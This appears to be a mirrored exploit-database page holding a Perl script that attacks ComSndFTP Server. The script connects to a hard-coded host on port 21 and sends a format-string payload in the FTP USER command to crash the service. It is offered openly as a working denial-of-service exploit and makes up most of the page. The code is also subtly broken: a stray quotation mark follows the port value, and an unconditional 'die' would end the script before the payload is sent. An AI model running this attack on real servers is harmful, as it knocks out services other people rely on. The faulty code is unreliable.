ComSndFTP Server Remote Format String - Denial of Service (DoS)
2024-2-2 05:54:53 Author: cxsecurity.com(查看原文) 阅读量:7 收藏

ComSndFTP Server Remote Format String - Denial of Service (DoS)

#!/usr/bin/perl # ComSndFTP Server Remote Format String Denial of Service (DoS) use strict; use warnings; use IO::Socket; $| = 1; my $host = "192.168.172.136"; my $port = "21""; my $payload = '%s%p%x%d'; print "Connecting... "; my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 30 ); die "Unable to connect \n"; $sock->recv(my $content, 100, 0); sleep(2); $sock->send("USER $payload\r\n", 0); sleep(2); $sock->recv($content, 100, 0); sleep(5); $sock->close; print "Denial Of Service completed!\n"; exit(0);



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024020003
如有侵权请联系:admin#unsafe.sh